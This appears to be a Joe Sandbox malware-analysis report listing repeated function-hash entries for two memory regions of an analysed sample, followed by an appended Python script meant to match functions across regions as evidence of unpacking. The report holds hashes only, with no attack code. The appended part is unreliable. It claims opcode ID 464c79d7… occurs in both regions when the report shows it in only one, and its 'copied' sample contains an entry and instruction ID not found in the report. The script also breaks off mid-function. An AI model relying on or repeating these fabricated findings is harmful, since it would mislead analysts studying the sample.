• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: ihgf
• API String ID: 0-2948842496
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
Strings
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: e83c2d8228cd7c3e31d317decdbb65ea87a4f0422b4fbeb11317de744b215f75
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF71BF32A083558FD714CE28C88071ABFE2ABC5750F29CDADE4949B3D1D675DD498B83
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: ed27ec38481fe18abb5f6d49f0ada3743b54db0131b37dfcca470e70f40376a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 774129B6E516518FD704DFA4CC455ABBB72FF84315B0AC1A8C8847B316D77869078BD0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                                                                                          • API String ID: 0-2991200456
                                                                                                                                                                                                                                                                          • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction ID: 57c911934f5113b50f2b86aa4a10d67e02802e2476c999b34427e51f289f5469
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63312534304300AFEB209F24DCA5BBBFBE4EB8A714F64457CE58593290D671EC92C656
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction ID: 635892821dd24938220c08374dc45870cbd9f2a878fc3f3e74dfd052ecd27d2d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731E774304301BBEB109F24DC81BBBBBE5EB86714F64496CE584A7291D771ECA0C656
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                          • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84cda8d1b3cadaeb417cba1a1dd2ecf0791d188558d852647f54521d7d05b699
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID: dB
• API String ID: 0-2104629891
• Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
• Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
• Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
• Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
• Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
• Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
• Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction ID: 2610ce8d2ada8b42ce1f8a49459609e4fff09a6b757421d9f45879ca41997f09
• Opcode Fuzzy Hash: 7dd1dd3bcd13b84c911ff83a91c1cc82912ef431115ec00b7fd8cedab479074d
• Instruction Fuzzy Hash: A8D10E36A187508FC704CF28D8D162AB7E2BBCE314F09897DE98687396D738D905CB46
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
• Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
• Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
• Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
• Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
• Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
• Instruction ID: e7338cdde584b833458eaa1077d9400485a2c46b1159b4053785f3d72223f4b8
• Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
• Instruction Fuzzy Hash: 51C105B16083808BD718DF25C8506AFBBE6EFD1314F14492DE4D687392DB75C50ACB56
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
• Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
• Instruction ID: fddb4a016f10892ade9b082f12ab6f1226a21cff05e62acad339ac0cfb4e7015
• Opcode Fuzzy Hash: a16964f98263bb64d29cf427ecac629650e46b659aa8a65445bff108377c5da2
• Instruction Fuzzy Hash: FD6154356083949FC725CF68C85092A7BE0AF96320F4882BDF9E48B3A2D675DC05D792
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                          • Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4515A7551C3408FD324CF24D880A6BB7F2EFC6304F14996CF886A7291D7349906CB4A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                          • Instruction ID: 140c6e5f0cb1e5e37d513d1aa2cc8db36553446330a9b58120872a6b76fac7cf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 074168B1A007458BD7248F79CC917B277E2EF92304F288569F6D2CBBA1EA39D841C700
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction ID: 0b7e3739174a86e16a50c6c09def73a72bbc323cd7e7b42fb1bfad7dbef391b5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A418EA01183D18ADB258B359060BBBBFD0EB93218F24599CC2D6A7682D7354407CB5A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                          • Instruction ID: 75d3905c4b6c91d683226b9ef92aa205fb85247b25b64a821013400a5f507110
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB419B76A587148FC324EF54ECC09BEB3E1EF86320FAE856CD5E517351E7609C508249
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction ID: bc552f82395c64de4cf9b90ca02ea0ba2278c60b9606e9f3872353e1967e0e13
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F317776A587548FC328EFA4F8C09BAB3E1EB8B310F6E856C85E60B351D7709D508649
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
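The entries above repeat the same Opcode ID (for example 464c79d7…, 305eeb48… and 3aeefbf0…) once in the PE-backed image mapped at 0x00400000 and once in the non-PE-backed region at 0x00AE0000, each time with a different Instruction ID. That pairing is the raw evidence behind the "Detected unpacking" signatures in the overview. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in the layout shown on this page, groups them by Opcode ID and reports functions present in both a PE-backed and an unbacked region. The sample text is copied from the entries above and trimmed to the fields parsed; the field regexes and the reading of "Opcode ID" as an operand-masked hash versus "Instruction ID" as a full-encoding hash are assumptions, since the report does not document either algorithm.

```python
"""Pair Joe Sandbox function entries across memory regions.

Added example, not Joe Sandbox code. Entry layout, regexes and the
interpretation of the ID fields are assumptions based on the visible text.
"""
import re
from collections import defaultdict

# Constructed sample: five entries copied from the report above, trimmed to
# the fields we parse (the Yara/Similarity/API lines are omitted here).
SAMPLE = """
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: 22904379a7e01b250fb42853a486526a462d9613ce69a31c9b3e8dc8a48adbf7
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
• Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
• Instruction ID: f0dfe561e574c5b04bf144357c30d0d8e3624fae8d6a5d5d31a0a28d0469a5e5
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
• Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
• Instruction ID: 140c6e5f0cb1e5e37d513d1aa2cc8db36553446330a9b58120872a6b76fac7cf
Memory Dump Source
• Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
• Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction ID: 0b7e3739174a86e16a50c6c09def73a72bbc323cd7e7b42fb1bfad7dbef391b5
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
• Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
"""

ENTRY_SPLIT = re.compile(r"^\s*Memory Dump Source\s*$", re.M)   # assumed delimiter
FIELD = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$", re.M)           # "• Key: value"
SOURCE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


def parse_entries(text):
    """Return one dict per entry: offset, pe_backed, opcode_id, instruction_id."""
    entries = []
    for chunk in ENTRY_SPLIT.split(text):
        fields = {k.strip(): v.strip() for k, v in FIELD.findall(chunk)}
        if "Opcode ID" not in fields or "Source File" not in fields:
            continue  # preamble or an entry without the fields we need
        m = SOURCE.search(fields["Source File"])
        if not m:
            continue
        entries.append({
            "offset": int(m.group(1), 16),
            "pe_backed": m.group(2) == "true",
            "opcode_id": fields["Opcode ID"],
            "instruction_id": fields.get("Instruction ID", ""),
        })
    return entries


def cross_region_matches(entries):
    """Opcode IDs seen both in a PE-backed region and in a non-PE-backed one.

    Same Opcode ID with different Instruction IDs across a file-backed image
    and an unbacked allocation is consistent with the same function being
    copied (and relocated) into memory the loader never mapped from disk.
    """
    by_opcode = defaultdict(list)
    for e in entries:
        by_opcode[e["opcode_id"]].append(e)
    matches = {}
    for opcode_id, group in by_opcode.items():
        backed = [e for e in group if e["pe_backed"]]
        unbacked = [e for e in group if not e["pe_backed"]]
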